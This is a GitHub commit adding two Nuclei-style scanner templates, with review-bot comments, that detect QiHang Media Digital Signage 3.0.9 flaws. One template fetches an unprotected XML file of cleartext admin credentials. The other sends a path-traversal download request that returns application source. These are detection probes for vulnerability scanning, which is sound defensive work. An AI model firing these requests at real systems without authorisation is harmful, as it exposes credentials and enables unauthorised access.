Merge pull request #2794 from gy741/rule-add-v63

Rule add v63
patch-1
Prince Chaddha 2021-10-01 16:30:47 +05:30 committed by GitHub
commit f7533d4d89
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 58 additions and 0 deletions


@ -0,0 +1,23 @@
id: qihang-media-disclosure
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
author: gy741
severity: critical
description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
tags: qihang,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/xml/User/User.xml"
matchers:
- type: word
words:
- "<?xml version"
- "<Users>"
- "account="
- "password="
condition: and
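Review bot: the only matcher in this template is the `type: word` block, with no status check beside it, so a response of any status code that happens to contain all four strings is reported as a critical finding. Add `matchers-condition: and` and a second matcher of `type: status` with `status: 200`, as the qihang-media-lfi template in this same commit does. The `description` should also state that the template only confirms that `/xml/User/User.xml` is readable without authentication.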


@ -0,0 +1,35 @@
id: qihang-media-lfi
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
author: gy741
severity: high
description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
tags: qihang,lfi
requests:
- raw:
- |
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: {{Hostname}}
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "filename=QH.aspx"
- "application/zip"
part: header
condition: and
- type: word
regex:
- "QH.aspx.cs"
- "QiHang.Media.Web.QH"
condition: and
- type: status
status:
- 200
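Review bot: the second matcher is declared `type: word` but lists its strings under `regex:` instead of `words:`, so the declared type and the key disagree and the body check for `QH.aspx.cs` and `QiHang.Media.Web.QH` may not be applied as intended. Both strings are written as literals (the dots are unescaped), so rename the key to `words:` and add `part: body` to make the target explicit, matching the `part: header` already set on the first matcher. If a regular expression is really wanted, change the type to `regex` and escape the dots.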